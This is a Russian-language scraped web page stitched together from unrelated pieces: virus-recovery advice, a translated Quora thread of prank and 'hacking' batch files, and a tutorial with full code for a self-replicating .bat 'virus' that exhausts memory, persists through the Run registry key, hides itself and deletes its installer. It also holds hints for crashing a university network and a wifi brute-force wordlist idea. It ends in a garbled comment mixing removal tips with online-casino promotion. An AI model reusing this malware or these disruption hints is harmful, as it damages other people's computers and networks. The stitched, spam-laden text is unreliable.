2 просмотров
Рейтинг статьи
1 звезда2 звезды3 звезды4 звезды5 звезд
Загрузка...

Восстановление работоспособности системы после вирусов

Восстановление работоспособности системы после вирусов.

&nbsp &nbsp Антивирусные программы, даже при обнаружении и удалении вредоносного программного обеспечения, далеко не всегда восстанавливают полную работоспособность системы. Нередко, после удаления вируса, пользователь компьютера получает пустой рабочий стол, полное отсутствие доступа в Интернет (или блокировку доступа к некоторым сайтам), неработающую мышку и т.п. Вызвано это, как правило, тем, что остались нетронутыми некоторые системные или пользовательские настройки, измененные вредоносной программой под свои нужды.

Самое крутое, что могут сделать всего 10 строк кода

Пользователи сайта Quora поделились своими примерами, что могут сделать 10 строк кода. Самые интересные ответы — в нашем материале.

Прамочете Пуджара, изучал информатику в Международном университете Тринити

Это 3D шар?

Два года назад я интересовался взломом Wifi через интернет. Я узнал о брутфорс-взломах. Поскольку большинство непальцев использовало там номер мобильного телефона в качестве пароля от сети wifi (возможно, это не все, но очень многие делали это), мне пришлось создать файл, содержащий мобильные номера от 9840000000 до 9850000000. Я даже не имел представления о Wordlist с Crunch. Я знал только Python. Поэтому я использовал его для создания огромных чисел. Это была одна из самых крутых вещей, которые я когда-либо делал.

Кушик Джоши

Мне на ум приходят несколько классных кодов. Все это командные файлы, так что вам надо будет скопировать их в Блокнот и сохранить с разрешением ‘.bat’.

  • Падающий зеленый код:

В этом коде нет особого смысла. Просто он круто выглядит.

  • Моя любимая шалость с использованием пакета:

Это НЕ вирусный файл. Он только делает так, что кажется, будто кто-то заразил ваш компьютер вирусом. Но все в порядке.

Этот код немного длиннее 10 строк, но все же он того стоит:

Последняя строка – лучшая часть этого кода. Она вырубит компьютер за 15 секунд, до ужаса испугав пользователя.

Поддельное поле сообщения об ошибке:

Это не командный файл. Это файл vbs. Его необходимо занести в блокнот и сохранить как ‘name.vbs’

Введите код в Блокноте:

Вместо “YOUR MESSAGE HERE” вы можете ввести любой текст, который хотите видеть в сообщении об ошибке (обратите внимание, что сообщение должно находиться в двойных кавычках).

Коды для ‘Button’:

  • 0 — OK
  • 1 — OK и Отмена
  • 2 — Прервать, Попробовать снова и Игнорировать
  • 3 — Да, Нет и Отмена
  • 4 — Да и Нет
  • 5 — Попробовать снова и Отменить
  • 0 — Нет значка
  • 16 — Значок критической ошибки
  • 32 — Значок со знаком вопроса
  • 48 — Значок-предупреждение
  • 64 — Значок-информация

Аноним

Самым крутым, что можно сделать с помощью всего 10 (или, возможно, 15) строк кода, было бы вывести из строя сеть компьютерного центра моего университета. Подходит только для Windows!

Ответ прост: у меня уже были серьезные проблемы из-за этого, и (хоть мне удалось выпутаться) я не хотел бы влипнуть снова.

Кроме того, я не собираюсь делиться фрагментами кода, поскольку распространять такой опасный код было бы неправильно. И все же я сделаю пару намеков.

  1. Создайте командный файл, чтобы вывести из строя компьютер. С помощью Google вы легко найдете код для этих целей. Он едва ли займет 5 строк.
  2. Скопируйте и вставьте файл в необходимые папки и убедитесь, что он открывается при запуске (каждый раз, когда компьютер загружается). В зависимости от версии Windows вам потребуется выполнить разные шаги. Возможно, придется немного покопаться, чтобы найти нужное расположение. На это уйдет еще 1 строка кода.
  3. Скопируйте и замените файл с тем же расположением на всех компьютерах сети. Этот этап самый сложный. Вы точно можете найти информацию на этот счет в интернете, но надо знать, где искать. А это знают только специалисты по безопасности. Мне как раз помог один из них. 2 строки, чтобы получить доступ к сети. 2 строки, чтобы миновать (не взломать) защиту паролем (если таковая имеется). 1 строка, чтобы скопировать файл в необходимую папку. 1 строка, чтобы перезапустить все системы сети. Как только все три шага проделаны, все системы (которые уже были ВКЛЮЧЕНЫ) начнут перезагружаться, а командный файл, который автоматически откроется при запуске, выведет из строя все компьютеры сети.
Читать еще:  Как добавить оперативную памят Часть перва?

Единственный способ все это исправить – это:

  • снова заменить все файлы оригинальными. (Это возможно, только если понимаешь, какого черта происходит с системой, чего технари в моем университете не понимали)
  • переустановить Windows на всех системах сети.

Это все способы, известные мне. Разумеется, существуют и другие, но повторюсь, я еще не профессионал, я только учусь.

Стив Кэплин, Художник/Писатель

Я написал этот код в 10 строк в программе для моделирования 3D-изображений OpenSCAD:

Он создает сферу, которая находится в полом кубе. Это изображение не только выглядит хорошо – две строки кода, которые сглаживают основу сферы, означают, что оно также доступно для 3D-печати.

Способы установки веб-браузеров Chromium

Вы можете случайно позволить взлом Chromium вируса, при установке новых программ с «Стандартным» или «Дефолтным» режимом. Очень важно изменить настройки установки, чтобы предотвратить проникновение потенциально нежелательных программ.

Все, что вам нужно сделать, это найти и правильно настроить параметры установки, поэтому выберите «Пользовательские» или «Дополнительные» настройки установки и найдите подозрительные флажки с подозрительными предложениями.

Если вы можете найти утверждения, которые предоставляют ваше разрешение на установку неизвестных программ, панелей инструментов браузера и аналогичных программных продуктов, не продолжайте установку до тех пор, пока вы не настроите их правильно. Снимите отметки с этих флажков, а затем продолжайте. Наконец, мы должны предупредить вас, что фальшивые браузеры Chromium могут распространяться через рекламу «Срочное обновление Chrome«.

Однако некоторые поддельные версии веб-браузеров могут попасть на компьютер жертвы при установке нелегального программного обеспечения. Мы настоятельно рекомендуем вам держаться подальше от бесплатных лицензионных пакетов, которые вы можете скачать с торрентов или других подозрительных веб-источников. Размещение их в вашей системе может привести к попаданию опасных файлов.

Как вирусы заражают смартофон или планшет

Чтобы вирус начал работать, мало его скачать, — надо еще и установить. Обычно вирусы загружаются в папку «Загрузки» (Download) и выглядят как установочные файлы приложений с расширением «apk».

Если нажать на вирус, появится список разрешений. Разрешения — это те действия, которые приложение сможет выполнять после установки.

Если нажать «Установить», вирус установится и начнет работать.

Создание самых простых вирусов не требует наличия специальных сред для разработки программ. И особых знаний, кстати, тоже. Создать вирусы довольно просто, если использовать для этого командную строку. Для этого нужно немного знать синтаксис командной строки и уметь создавать .bat-файлы.

Что такое .bat-файл и как его создать?

Если очень поверхностно, то это файлы с расширением .bat. Такие файлы несут в себе команды, которые должны быть выполнены командным интерпретатором Windows. Все те команды, которые можно выполнить в окне командной строки, можно вписать в .bat-файл и запустить. Результат будет одинаковым.

Читать еще:  Net framework версии 3.5. Устанавливаем или обновляем, исправляем ошибки. Системные требования для оптимальной работы.Net Framework

Чтобы создать .bat-вирус, нам нужен обычный текстовый редактор. В идеале подойдет для этих целей Блокнот. Создав и открыв новый текстовый документ, Вам нужно вписать туда тот код(команды), которые он должен выполнить. После этого, Вам нужно с помощью меню Сохранить как сохранить этот файл, задав ему какое-либо имя с расширением .bat и указав тип файла Все файлы.

Создаем простейший вирус

В данной статье мы рассмотрим создание вируса, который после своего запуска будет бесконечно открывать окно командной строки. Бесконечно и очень быстро открывающиеся окна командной строки не дадут пользователю спокойно работать. Закрыть их всех не успеет никто и очень скоро они забьют оперативную память компьютера, что в свою очередь сильно затормозит работу компьютера, вплоть до полного зависания. Выглядеть это будет приблизительно так:

Вдобавок, мы закинем наш вирус в автозагрузку, что обеспечит автоматический запуск вируса вместе с операционной системой.

Код создаваемого вируса

Сколько программистов, столько разных решений можно придумать для каждой задачи. Я приведу один из своих методов решения такой задачи.

[code]md c:papka
echo start c:papkavirus.bat>c:papkavirus.bat
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionRun /v virus /d c:papkavirus.bat
attrib +r +h +s c:papka
attrib +r +h +s c:papkavirus.bat
start c:papkavirus.bat
del %0[/code]

А теперь разберем сам код. Первая строчка создает папку с именем papka в корне диска C:/. Такой адрес приведен только для примера. Использование же корня папки C:/ не совсем хороший вариант для вируса. Если Вы хотите обеспечить хорошую выживаемость Вашему вирусу, лучше всего спрятать его подальше. Первую команду можно даже пропустить, если Вы закинете сам вирус в уже созданную директорию.

Вторая строчка создает файл c:papkavirus.bat и, с помощью команды echo, вписывает в него команду start c:papkavirus.bat. Тут нужно знать, что после знака > указывается место вывода приведенной команды. Тут Вам нужно познакомится: c:papkavirus.bat и есть основное тело вируса. Созданный нами .bat-файл с кодом, который мы сейчас разбираем, является всего лишь установщиком нашего основного вируса. Вы можете использовать другое название и другое местоположение для вируса.

Третья строчка закидывает созданный нами во второй строчке тело вируса в автозагрузку. Для этого используется пользовательская ветка реестра, так как к ней у пользователя всегда есть доступ. А вот использовать автозагрузку компьютера не безопасно, так как пользователь может не иметь административного доступа, что вызовет ненужную ошибку.

Четвертая и пятая строка кода изменяют атрибуты вируса и папки, где хранится вирус. Данными командами, а для этого используется команда attrib, мы добавляем атрибуты Только чтение, Скрытый и Системный и для папки, и для вируса. Использование атрибута r(Только чтение) необязательно. А вот атрибуты Скрытый и Системный хорошо защитят созданный нами вирус. Если не верите, то почитайте статью про вирус, который превращает папки на флешке в ярлыки. Он использует именно эту технологию.

6-ая строчка кода запускает наш вирус. Вы можете пропустить этот пункт, если хотите, чтобы первый запуск вируса произошел только после перезагрузки компьютера.

И, наконец-то, последняя, 7-ая строчка удаляет данный .bat-вирус. Это полезно, так как по этому .bat-файлу можно спокойно выйти на созданный нами вирус и удалить его.

Смысл созданного вируса

Смысл вируса, который уместился в эти 7 строк — создать основной вирус, защитить его и обеспечить его постоянную работу. А так же подмести свои следы. А что делает основной вирус? После запуска основного вируса, он выполняет ту команду, которая вписана в нее. А это команда, в свою очередь, запускает наш вирус, который опять-таки снова запускает самого себя. И так до бесконечности.

Читать еще:  Как перенести контакты с Windows Phone на Android - подробная инструкция

Как бороться с такими вирусами?

Во-первых, начало борьбы с данным вирусом начнется после того, как он запуститься. Очень скоро вирус заполнит своими копиями оперативную память и Вы даже мышкой шевельнуть не сможете. Поэтому, такой спектакль нужно пресекать сразу. Для этого прекрасно подойдет кнопка Break на клавиатуре. Жмите ее столько, сколько понадобится, чтобы новые копии перестали создаваться. На клавиатурах без кнопки Break, может помочь сочетание клавиш Ctrl+C.

Как удалить такой вирус?

Вы можете найти и удалить вирус через его запись в автозагрузке(подробнее по ссылке). А так же Вы можете выйти на вирус по команде, которая будет высвечиваться в окне командного интерпретатора. Естественно, если Вы сможете добраться до скрытого и системного файла. Вот таким образом происходит создание простого вируса.

Удалить рекламу Вулкан Чемпион Казино Пошаговая инструкция.

А так же с C:UsersApp Data удалить все что связано с браузером и вообще всякие подозрительные файлы через тотал коммандер! д., в реестре искал, файлы искал — ничего не помогало. Кто не может найти, нажимаем Win r и в командной строке вводим Далее находим это самое задание, которое настроено включаться каждые примерно 20 минут. Сколько искал решение этой проблемы в интернете — не нашёл, кроме дебильных советов проверить анивирусами. :)по большей части это не вирус, а задача с периодичностью запуска от 10 мин до часа вне зависимости от того что вы делаете. Часто люблю с телефона крутить автоматы – очень компактно и реалистично.-Для моего определения любимого казино всего 2 параметра. выполниь MSCONFIG и поотключать там то службы и приложения которые не устанавливал. Командная строка типа такой: «/casino.com»Если заданий слишком много, можно отсортировать по времени последнего запуска. смотрите в планировщике задач (написано ниже как туда зайти) какие задачи запускаются, время последнего и следующего запуска поможет отследить то что Вам мешает. (заодно подчистите все что там накопилось ненужное.)пуск/стандартные/служебные/планирование задач (или как то так зависит от версии операционной системы)Вообще-то, не люблю про свое увлечение рассказывать. Раз вопрос появился, малость расскажу-Играю уже начиная с 2006 в различных казино. То, которое близко по дизайну и чтобы деньги переводили за выигрыш.-Главное, когда играете – снимайте радужные очки. В игровых заведениях невозможно постоянно одерживать победу. А иногда попадаешь и недели две подряд только выигрыши. По моему опыту кручу обычно однорукого бандита, до тех пор пока не выиграю по крупному, или делаю в каждом по 20 — 30 прокрутов. Проверяю каждый день почти и смотрю играют автоматы на победу или нет. Автоматы вычисляют число выигрышей по теории вероятности. Здесь и весь секрет.-Уже давно стараюсь пользоваться данным открытым перечнем Люди те, которые постоянно крутят однорукого бандита, знают его. Сам для себя уже проверил неплохой суммой и занимаюсь любимым делом только в проверенных местах.-Испытайте удачу! Эти игровые заведения удерживают свою репутацию давно и всегда выплачивают.. Главное, с разнообразных популярных сайтов с торентами и других ресурсов не рекомендую кликать по рекламе. Новичкам говорят она сопутствует-Из недавнего – на неделе немного выиграл в игровом автомате с названием Гараж. Виртуальные казино, покер румы, игровые автоматы и прочие азартные развлечения рекламируются различными способами, в том числе и мошенническими. Чтобы привлечь на онлайн ресурс новых пользователей, используется всевозможная реклама и это не только вирусный маркетинг.

Например, казино Вулкан устанавливает без ведома пользователя специальные моды, плагины, расширения, которые классифицируются как вирусные. Когда пользователь открывает браузер, он попадает на сайт виртуального казино.

Ссылка на основную публикацию
Статьи c упоминанием слов:
Adblock
detector